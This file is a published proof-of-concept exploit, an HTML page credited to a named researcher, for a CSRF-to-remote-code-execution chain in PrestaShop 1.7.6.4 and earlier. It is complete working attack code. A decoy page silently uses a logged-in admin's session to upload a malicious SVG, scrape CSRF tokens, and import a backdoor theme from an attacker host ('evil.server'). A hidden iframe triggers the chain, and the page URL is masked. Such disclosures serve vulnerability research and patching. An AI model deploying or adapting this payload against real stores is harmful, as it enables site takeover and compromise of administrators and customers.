<html>
<!--
# Exploit Title: Prestashop <= 1.7.6.4 single-click RCE exploit
# Date: 2020-04-11
# Exploit Author: Sivanesh Ashok | @sivaneshashok | stazot.com
# Vendor Homepage: https://www.prestashop.com/
# Version: 1.7.6.4 and below
# Tested on: Windows 10 / XAMPP / Prestashop v1.7.6.4
Prestashop <= 1.7.6.4 single-click RCE exploit
Written by Sivanesh Ashok | @sivaneshashok | stazot.com
For more details, visit https://stazot.com/prestashop-csrf-to-rce-article
Change the values of the 3 variables marked as "change this"
-->
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<h3>This is totally a legit page. Just keep reading this for a minute :)</h3>
<script>history.pushState('', '', '/')</script>
<script>
var target = "http://localhost"; //change this
var admin_url = "/admin123ab45cd"; //change this
var theme_url = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip file
var xhr0 = new XMLHttpRequest();
xhr0.open("GET", target+admin_url+"/filemanager/dialog.php");
xhr0.withCredentials = true;
xhr0.send();
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", target+admin_url+"/filemanager/upload.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------6487332036660663652470259777");
xhr.withCredentials = true;
var body = "-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"exploit.svg\"\r\n" +
"Content-Type: image/svg+xml\r\n" +
"\r\n" +
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\x3e\r\n" +
"\r\n" +
"\t\x3cscript xlink:href=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js\"\x3e\x3c/script\x3e\r\n" +
"\t\r\n" +
"\t\x3cscript\x3e\r\n" +
"\t\r\n" +
"\t$.ajaxSetup({async: false});\r\n" +
"\r\n" +
"\tvar target = \'" + target + "\';\r\n" +
"\tvar admin_url = \'" + admin_url + "\';\r\n" +
"\tvar theme_url = \'" + theme_url + "\';\r\n" +
"\tvar import_url = \'\';\r\n" +
"\tvar import_token = \'\';\r\n" +
"\t\r\n" +
"\t$.get(target+admin_url+\'/index.php/improve/design/themes/import\', function( my_var0 ) {\r\n" +
"\t\r\n" +
"\t\tvar tmp = my_var0.match(/_token(.{44})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\"=\");\r\n" +
"\t\ttmp = tmp[1];\r\n" +
"\t\timport_url = target+admin_url+\'/improve/design/themes/import?_token=\'+tmp;\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\t$.get(import_url, function( my_var1 ) {\r\n" +
"\r\n" +
"\t\tvar tmp = my_var1.match(/import_theme__token(.{101})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\' \');\r\n" +
"\t\ttmp = tmp[3].toString().split(\'=\\\"\');\r\n" +
"\t\timport_token = tmp[1];\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\tvar themeUploadData = new FormData();\r\n" +
"\tthemeUploadData.append(\'import_theme[import_from_web]\', theme_url);\r\n" +
"\tthemeUploadData.append(\'import_theme[_token]\', import_token);\r\n" +
"\r\n" +
"\t$.ajax({\r\n" +
"\t\turl: import_url,\r\n" +
"\t\tdata: themeUploadData,\r\n" +
"\t\tcache: false,\r\n" +
"\t\tcontentType: false,\r\n" +
"\t\tprocessData: false,\r\n" +
"\t\tmethod: \'POST\'\r\n" +
"\t});\r\n" +
"\r\n" +
"\t\x3c/script\x3e\r\n" +
"\r\n" +
"\x3c/svg\x3e\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
window.setTimeout(function(){
submitRequest();
}, 1500);
window.setTimeout(function(){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = target+"/img/cms/exploit.svg";
document.body.appendChild(iframe);
}, 4000);
</script>
</body>
</html>
